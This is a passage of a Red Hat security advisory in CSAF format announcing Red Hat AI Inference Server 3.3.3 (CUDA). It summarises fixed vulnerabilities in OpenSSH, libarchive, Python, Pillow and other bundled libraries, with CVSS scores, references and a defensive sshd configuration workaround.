Vulnerability from csaf_redhat - Published: 2026-05-11 15:49 - Updated: 2026-05-14 22:36A flaw was found in the OpenSSH GSSAPI (Generic Security Service Application Program Interface) delta patches, as included in various Linux distributions. A remote attacker could exploit this by sending an unexpected GSSAPI message type during the key exchange process. This occurs because the `sshpkt_disconnect()` function, when called on an error, does not properly terminate the process, leading to the continued execution of the program with uninitialized connection variables. Accessing these uninitialized variables can lead to undefined behavior, potentially resulting in information disclosure or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Python. The `webbrowser.open()` API, used to launch web browsers, does not properly sanitize input. This allows a remote attacker to craft a malicious URL containing leading dashes. When such a URL is opened, certain web browsers may interpret these dashes as command-line options, which could lead to unexpected behavior, information disclosure, or potentially arbitrary code execution, impacting the integrity of the system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of service (DoS) conditions.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in giflib. This double-free vulnerability, caused by a shallow copy in GifMakeSavedImage and incorrect error handling, may allow an attacker to corrupt memory. While difficult to trigger, successful exploitation could potentially lead to arbitrary code execution or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in cbor2, a library for encoding and decoding Concise Binary Object Representation (CBOR) data. A remote attacker can exploit this vulnerability by sending a specially crafted CBOR payload containing deeply nested structures. This can cause the application to crash due to uncontrolled recursion, leading to a complete Denial of Service (DoS) for the affected application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
|
A flaw was found in nghttp2. Due to missing internal state validation, the library continues to process incoming data even after a session has been terminated. A remote attacker could exploit this by sending a specially crafted HTTP/2 frame, leading to an assertion failure and a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
|
A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library's failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Pillow, a Python imaging library. A malicious actor could exploit this vulnerability by providing specially crafted nested lists as coordinates to image processing APIs within Pillow. This could lead to a heap buffer overflow, potentially causing a denial of service in applications using the library.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
|
A flaw was found in Pillow, a Python imaging library. A remote attacker could supply a specially crafted malicious PDF file, causing the application to hang indefinitely and consume 100% CPU. This vulnerability leads to a Denial of Service (DoS), making the application unresponsive.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 | — |
Vendor Fix
fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat AI Inference Server 3.3.3 (CUDA) is now available.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat\u00ae AI Inference Server",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:16030",
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
},
{
"category": "external",
"summary": "https://www.redhat.com/en/products/ai/inference-server",
"url": "https://www.redhat.com/en/products/ai/inference-server"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-23868",
"url": "https://access.redhat.com/security/cve/CVE-2026-23868"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26209",
"url": "https://access.redhat.com/security/cve/CVE-2026-26209"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27135",
"url": "https://access.redhat.com/security/cve/CVE-2026-27135"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27622",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3497",
"url": "https://access.redhat.com/security/cve/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40192",
"url": "https://access.redhat.com/security/cve/CVE-2026-40192"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42308",
"url": "https://access.redhat.com/security/cve/CVE-2026-42308"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42309",
"url": "https://access.redhat.com/security/cve/CVE-2026-42309"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42310",
"url": "https://access.redhat.com/security/cve/CVE-2026-42310"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42311",
"url": "https://access.redhat.com/security/cve/CVE-2026-42311"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4424",
"url": "https://access.redhat.com/security/cve/CVE-2026-4424"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4519",
"url": "https://access.redhat.com/security/cve/CVE-2026-4519"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-5121",
"url": "https://access.redhat.com/security/cve/CVE-2026-5121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-5201",
"url": "https://access.redhat.com/security/cve/CVE-2026-5201"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_16030.json"
}
],
"title": "Red Hat Security Advisory: Red Hat AI Inference Server 3.3.3 (CUDA)",
"tracking": {
"current_release_date": "2026-05-14T22:36:16+00:00",
"generator": {
"date": "2026-05-14T22:36:16+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:16030",
"initial_release_date": "2026-05-11T15:49:50+00:00",
"revision_history": [
{
"date": "2026-05-11T15:49:50+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-05-12T17:26:30+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:16+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat AI Inference Server 3.3",
"product": {
"name": "Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ai_inference_server:3.3::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat AI Inference Server"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"product": {
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"product_id": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vllm-cuda-rhel9@sha256%3A3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c?arch=amd64\u0026repository_url=registry.redhat.io/rhaiis\u0026tag=1778274666"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64",
"product": {
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64",
"product_id": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/vllm-cuda-rhel9@sha256%3Ae3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7?arch=arm64\u0026repository_url=registry.redhat.io/rhaiis\u0026tag=1778274666"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64 as a component of Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64"
},
"product_reference": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"relates_to_product_reference": "Red Hat AI Inference Server 3.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64 as a component of Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
},
"product_reference": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64",
"relates_to_product_reference": "Red Hat AI Inference Server 3.3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-3497",
"cwe": {
"id": "CWE-824",
"name": "Access of Uninitialized Pointer"
},
"discovery_date": "2026-03-12T19:01:37.007806+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2447085"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the OpenSSH GSSAPI (Generic Security Service Application Program Interface) delta patches, as included in various Linux distributions. A remote attacker could exploit this by sending an unexpected GSSAPI message type during the key exchange process. This occurs because the `sshpkt_disconnect()` function, when called on an error, does not properly terminate the process, leading to the continued execution of the program with uninitialized connection variables. Accessing these uninitialized variables can lead to undefined behavior, potentially resulting in information disclosure or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openssh: OpenSSH GSSAPI: Information disclosure or denial of service due to uninitialized variables",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "IMPORTANT: This vulnerability affects the OpenSSH GSSAPI delta as implemented in Red Hat Enterprise Linux and OpenShift Container Platform. An unauthenticated attacker could send a specially crafted GSSAPI message during key exchange, leading to the use of uninitialized variables and potentially undefined behavior. The severity of the impact is dependent on compiler hardening configurations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3497"
},
{
"category": "external",
"summary": "RHBZ#2447085",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447085"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3497",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3497"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3497",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://ubuntu.com/security/CVE-2026-3497",
"url": "https://ubuntu.com/security/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2026/03/12/3",
"url": "https://www.openwall.com/lists/oss-security/2026/03/12/3"
}
],
"release_date": "2026-03-12T18:27:44.917000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable GSSAPI key exchange in the OpenSSH server configuration. This prevents the server from processing GSSAPI messages, eliminating the vulnerability\u0027s attack surface.\n\nEdit `/etc/ssh/sshd_config` and add or modify the line:\n```\nGSSAPIKeyExchange no\n```\n\nAfter saving the changes, restart the `sshd` service for the mitigation to take effect. This action will prevent users from authenticating via GSSAPI.\n\n```\n# systemctl restart sshd\n```",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openssh: OpenSSH GSSAPI: Information disclosure or denial of service due to uninitialized variables"
},
{
"acknowledgments": [
{
"names": [
"Elhanan Haenel"
]
}
],
"cve": "CVE-2026-4424",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2026-03-19T12:22:21.740000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449006"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libarchive: libarchive: Information disclosure via heap out-of-bounds read in RAR archive processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "IMPORTANT: This heap out-of-bounds read vulnerability in libarchive\u0027s RAR archive processing logic can lead to information disclosure. A remote attacker can exploit this flaw by providing a specially crafted RAR archive, potentially revealing sensitive heap memory information without requiring authentication or user interaction on systems that process untrusted archives.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4424"
},
{
"category": "external",
"summary": "RHBZ#2449006",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449006"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4424",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4424"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4424",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4424"
},
{
"category": "external",
"summary": "https://github.com/libarchive/libarchive/pull/2898",
"url": "https://github.com/libarchive/libarchive/pull/2898"
}
],
"release_date": "2026-03-19T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "libarchive: libarchive: Information disclosure via heap out-of-bounds read in RAR archive processing"
},
{
"cve": "CVE-2026-4519",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"discovery_date": "2026-03-20T16:02:13.494105+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449649"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Python. The `webbrowser.open()` API, used to launch web browsers, does not properly sanitize input. This allows a remote attacker to craft a malicious URL containing leading dashes. When such a URL is opened, certain web browsers may interpret these dashes as command-line options, which could lead to unexpected behavior, information disclosure, or potentially arbitrary code execution, impacting the integrity of the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python: Python: Command-line option injection in webbrowser.open() via crafted URLs",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4519"
},
{
"category": "external",
"summary": "RHBZ#2449649",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4519",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4519"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4519",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4519"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/issues/143930",
"url": "https://github.com/python/cpython/issues/143930"
},
{
"category": "external",
